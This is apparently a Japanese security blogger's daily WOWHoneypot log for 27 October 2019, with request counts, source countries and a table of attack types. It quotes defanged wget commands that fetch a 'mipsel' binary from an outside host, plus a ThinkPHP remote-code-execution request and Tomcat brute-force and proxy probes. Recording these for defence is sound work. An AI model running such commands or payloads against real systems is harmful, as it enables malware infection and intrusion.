23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(225日目)

2019/10/27(日)

トータルは2147件でした。

ハンティングログは以下です。

174.100.54[.]91 wget+hxxp[:]//185.172.110[.]220/mipsel
142.129.210[.]152 wget+hxxp[:]//185.172.110[.]220/mipsel
154.56.69[.]150 wget+hxxp[:]//185.172.110[.]220/mipsel
92.253.52[.]139 wget+hxxp[:]//185.172.110[.]220/mipsel
149.200.177[.]138 wget+hxxp[:]//185.172.110[.]220/mipsel
46.151.44[.]54 wget+hxxp[:]//185.172.110[.]220/mipsel

www.virustotal.com
www.virustotal.com

IPのロケーション別の件数は以下です。

ウルグアイ 1712
スイス 360
アメリ 19
中国 11
ブラジル 7
オランダ 5
スペイン 5
ロシア 3
イタリア 3
インドネシア 3
トルコ 2
ウクライナ 2
ブルンジ 2
ヨルダン 2
ポーランド 2
チリ 1
メキシコ 1
インド 1
フランス 1
ギリシャ 1
イラン 1
ケニア 1
エクアドル 1
パキスタン 1

f:id:sec23:20191103173543p:plain

件数 概要 リクエス
2075 GET /manager/html
44 アクセス GET /
6 Tomcat管理ページに対するブルートフォース攻撃Tomcat管理ページに対するブルートフォース攻撃 POST /tmUnblock.cgi
3 DVR/NVR/IPC のAPIにおける脆弱性を狙った通信 POST /editBlackAndWhiteList
3 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php
2 ThinkPHPの脆弱性を狙った通信 POST /TP/public/index.php?s=captcha
2 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
2 Tomcatの調査 GET /manager/text/list
1 Spring Data Commonsの脆弱性を狙った通信 POST /users?page=&size=5
1 ログインページの調査 GET login.cgi
1 不正中継の調査 GET hxxp[:]//www.rx2.eu/ivy/azenv.php?lang=eng
1 不明 GET /servlet?m=mod_listener&p=login&q=loginForm&jumpto=status
1 Ciscoのcfgファイルの調査 GET /pps/cisco/cisco.cfg
1 アクセス GET /favicon.ico
1 phpMyAdminの調査 GET /admin-scripts.asp
1 不正中継の試み CONNECT www.rx2.eu:443
1 不正中継の試み CONNECT www.google.com:443
1 不正中継の試み CONNECT microsoft-com.mail.protection.outlook.com:25